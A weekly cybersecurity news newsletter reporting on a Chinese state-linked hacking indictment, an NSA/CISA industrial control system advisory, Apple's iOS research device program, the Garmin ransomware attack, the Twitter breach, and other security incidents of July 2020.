Srsly Risky Biz: Tuesday, July 28

Chinese campaign a sad indictment of infosec, NSA warns of imminent ICS attacks, Apple throttles iOS research

Your weekly dose of Seriously Risky Business news is supported by the Cyber Initiative at the Hewlett Foundation.

MSS-linked hackers’ 101 tradecraft a winning formula

US authorities have unsealed the indictment of two prolific state-sponsored Chinese hackers accused of a ten-year espionage and cybercrime spree that pilfered data from dozens of organisations across the globe.

The indictment details how Li Xiaoyu and Dong Jiazhi were routinely tasked by Guangdong State Security Department (part of China's Ministry of State Security) with the theft of secrets of national significance. Li and Dong were essentially independent contractors who also dabbled in cybercrime as a side-hustle.

Known victims included defence contractors, medical researchers, political dissidents, software companies and even religious clergy. Targets were located in 11 countries that included Australia, Europe, the United Kingdom and United States.

What is striking about the indictment is what little innovation was required to compromise targets. Li and Dong exploited known vulnerabilities in internet-facing servers, installed web shells (China Chopper), imported other open source tools into target environments (for command execution and credential dumping) and exfiltrated data via RAR files.

When they did need access to sophisticated tooling they didn’t roll their own. Investigators established that on one occasion, the indicted duo had to ask their handlers at China's Ministry of State Security to provide access to a zero-day exploit to help them complete a mission.

Many of the victims appear to be the sort of large organisations that should have the capability and tooling required to prevent simple attacks. What does it say when a team of two was able to freely bypass preventative controls at well-funded organisations so often, seldom requiring the use of 0day or custom malware? It's worth revisiting the ASD and NSA guide [pdf] to detecting web shells published in April 2020, which in hindsight might have deserved more than 34 words in Seriously Risky Business.

It's also reasonable to ask whether in the absence of custom malware, threat intelligence providers incorrectly clustered the duo's activities with other, better known groups.

Given the amount of information law enforcement had on these guys, the remaining question is what signal the United States was sending when choosing this specific time to go public: the same week authorities ordered a Chinese consulate in Houston to close down.

If the media conference announcing the indictments was anything to go by, China wasn't the only audience US authorities had in mind.

"China is facing degradation of its image on the world stage," warned US Assistant Attorney General Jon Demers. "Other nations partnering with China in economic development projects should closely consider their alliances with a country that has so little regard for international law."

NSA warns of attacks targeting industrial control systems

The NSA and CISA have warned operators of industrial control systems to prepare for an escalation in "malicious cyber activity" against internet-accessible operational technology (OT).

Operators of industrial control systems need to be mindful of "heightened tensions" and adversaries "seeking to retaliate for perceived US aggression", the advisory said.

The advisory wasn't specific about which of the many US foreign policy challenges was causing issues.

Iran is likely to feel particularly aggrieved about a pattern of mysterious explosions in recent weeks at facilities that are obvious targets for state-sponsored sabotage. But who knows? It’s just as likely that Iran’s infrastructure is going boom as a consequence of sanctions that are gradually strangling its ability to maintain critical systems. It’s fun to imagine the whole thing is an Israeli op, and it very well might be. Revelations that the CIA was granted broad authority to conduct covert cyber operations throws another pinch of confusion into the mix. There's plenty of room for miscalculation.

The NSA/CISA advisory recommends critical infrastructure operators reduce the exposure of OT networks to the internet by isolating administrative access and segmenting networks. It also recommends operators map out their OT assets and subject them to continuous vulnerability monitoring.

Separately, CISA notified operators of vulnerabilities in Schneider Electric's safety systems. These are systems programmed to safely shut down machinery when a dangerous condition is detected in the operating environment. One of the bugs - a debug port left open in Tricon CX controllers (CVE-2020-7491) - is remotely exploitable and scored a CVSS10 for severity. Yikes.

Apple’s Security Research Devices land, with a catch

Apple has launched its Security Research Device (SRD) access program. The SRD is a modified iPhone designed for security researchers to tinker with, first announced at Black Hat in August 2019.

Apple will make SRDs available to researchers of its choosing on 12-month leases. These leases will only be accessible to individuals from 23 specific countries. Any vulnerabilities discovered by researchers using the device will be bound by Apple's disclosure terms.

Some of the world's top iOS security researchers rejected the program from the outset. There are already tools available in the market, such as Corellium, which can be used to emulate iOS software for testing purposes, and the resulting vulnerability information (and exploits) can be disclosed, reported or sold as the researcher sees fit.

Google's Project Zero team won't apply for SRDs. As a matter of policy Project Zero publishes bug information within 90 days of disclosing it to affected vendors. Apple demands that participants in the SRD program maintain confidentiality about their findings until a time of Apple’s choosing.

The SRD program should be viewed in the context of Apple's unresolved lawsuit against Corellium. Apple argues [pdf] that Corellium's software, a tool for virtualising iOS hardware, is "profiting from blatant copyright infringement." It has sought a permanent injunction against further sale of Corellium licenses and an order to "impound and destroy all infringing materials."

In its defence, Corellium argues [pdf] that its products could not infringe copyright as the products do not run any Apple code. Further, use of the software is 'transformative' in the sense that it works to a new purpose (vulnerability research) that Apple doesn’t provide, subjecting it to protection under fair use doctrine. Apple's counterargument is that the question of whether individual researchers should be protected by "fair use" when using Corellium software is irrelevant to whether the act of selling access to the testing software infringes copyright.

Apple’s litigation has reportedly had an adverse impact on Corellium sales.

Garmin resuming operations after ransomware attack

Digital wearables vendor Garmin is recovering from a ransomware attack that crippled most of its mapping and tracking services.

Garmin shut down most of its operations on July 23 to respond to the attack. The last of its consumer-facing services came back online earlier today (July 27).

Sources told ZDNet, TechCrunch and Bleeping Computer that the company was infected with WastedLocker malware recently attributed to Russian organised crime group, Evil Corp. Sergiu Gatlan at Bleeping Computer reports that a file encrypted with WastedLocker and addressed to Garmin was uploaded to VirusTotal by a user in Taiwan on July 22.

The attackers reportedly sought US$10 million in ransom payments from Garmin. The company hasn't disclosed whether it paid up. That's a sensitive issue: Evil Corp and several of its crew have been sanctioned by US authorities. Transferring them money, even under duress, is seriously risky business.

Ransomware operators also disrupted the Australian arm of Nielsen this week, delaying its feed of TV ratings by six days and counting. Schools, universities, hospitals and medical research centres are one thing... but television ratings agencies? Is nothing sacred?

Twitter attackers accessed direct messages

Attackers accessed the direct message inbox for 36 of the 45 Twitter accounts compromised in a security incident earlier this month, and chose to download all Twitter data for 8 of them, the social media company has revealed.

Twitter is yet to confirm allegations in the New York Times that attackers obtained the credentials required to access Twitter's administrative systems by first hacking into Twitter's Slack (messaging) account. Former employees told Reuters that over 1000 Twitter staff have access to the administrative system from which email addresses associated with accounts can be changed.

Twitter's final report, if made public, will make for a good study in user training. Twitter has divulged that attackers "successfully manipulated a small number of employees and used their credentials to access Twitter’s internal systems, including getting through our two-factor protections."

In some implementations of two-factor authentication, users aren't provided much context on what action triggered an authentication challenge or can become fatigued by the number of challenges they receive. That creates perfect conditions for attackers with a knack for social engineering.

[SPONSORED ITEM] Relief for patch pain

If there's one issue 100% of IT shops struggle with, it's getting consistent, timely patching across all of your endpoints.

Our newsletter sponsor Automox obsesses over making patch management easier. This refreshed technical guide [pdf] tells you exactly how it's done: with lightweight agents on every endpoint (Windows, Mac, Linux) that can be administered from an AWS-hosted management panel. That document is a rare thing in infosec -- it actually tells you what the product is and how it works.

Updates can automatically be fetched from the Automox cloud or your own local server according to simple policies, or you can write custom rules for each OS and application. It comes with all the reporting you'd expect out of the box, plus there is an API for third-party reporting tools.

Take a look and drop us a line with any feedback.

Cisco devices are getting owned

Another remotely-exploitable bug in Cisco kit (CVE-2020-3452) was published since our last newsletter, and it's already being exploited in the wild.

The vulnerability affects Cisco's Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. A PoC was published July 23 and every man and his dog have written Google and Shodan dorks to search for vulnerable devices ever since.

It's yet another security issue discovered by Mikhail "blood in the water" Klyuchnikov at Positive Technologies, the same Mikhail who dropped the oft-exploited bugs in Citrix NetScaler and F5 Big-IP network devices. CISA warns that unpatched F5 boxes were still under attack as this newsletter hit your inbox.

Fancy Bear snooping on US energy networks

Several US-based organisations were targets of APT28 (Fancy Bear) attacks between December 2018 and May 2020, according to an FBI advisory seen by Andy Greenberg at Wired. At least one victim was a "US energy entity".

Blackbaud clients demand answers after ransomware attack

Software company Blackbaud paid a ransomware gang not to release client data stolen in a May 2020 attack. The attackers copied data off Blackbaud's network before the company's blue team detected the intrusion and thwarted attempts to encrypt data on affected devices. Blackbaud clients, many of them universities, are now upset that it took until July 16 to learn their data had been exfiltrated.

Twitter throttles QAnon harassment campaigns

Twitter removed 7000 accounts and will no longer promote content from 150,000 others to crack down on coordinated harassment campaigns by followers of QAnon conspiracy theories. TikTok followed suit, removing QAnon hashtags. The QAnon movement has now been denied its home at 8chan (shut down), its dedicated communities at Reddit and Facebook (moderated) and amplification on Twitter and TikTok (throttled).

Twilio's SDK compromised in malvertising scam

Messaging software company Twilio was humbled by attackers that accessed and modified its TaskWriter SDK as part of a malvertising campaign. Twilio only learned of the compromise through a tip-off, and its investigation found that the SDK was left unsecured in an AWS bucket with read and write permissions left on. Thankfully the doctored SDK was only live for eight hours.

FBI investigates GoldenSpy infections

The FBI has warned defenders of US networks about the GoldenSpy/GoldenHelper campaigns covered in Seriously Risky Biz over the last few weeks. The FBI recently investigated an infection at a US pharmaceutical company after it installed tax software mandated by Chinese authorities. This snowball has some steep downhill slope in front of it now.

Bounty out for SEC hackers

The US Department of State will pay a US$1 million bounty for information that leads to the arrest of either of the two Ukrainians accused of hacking SEC's EDGAR system in 2016.  Artem Radchenko and Oleksandr Ieremenko were blamed for the campaign in a January 2019 indictment, and remain at large. In Ukrainian terms, a tip-off could be worth 27,801,664. That’s enough to buy five luxury Kiev apartments: one for the informant and one for each of their new bodyguards.

This meme saved the internet today

In case you missed it last week, the Emotet botnet is back in a big way. But it could have been bigger. An unidentified hero discovered that Emotet payloads were hosted on compromised websites, each controlled by web shells protected with weak passwords. Our hero has been methodically hacking into these web sites to replace the payload with memes. Analysts estimate this funny business rendered a quarter of Emotet infections fruitless and cost Ivan (the purported name of the botnet's admin) at least one day of lost productivity.


The email version of this newsletter erroneously reported that the US ordered two Chinese consulates to close down. Only one consulate in Houston was subject to this order. The same story misspelled ‘Guangdong’ province.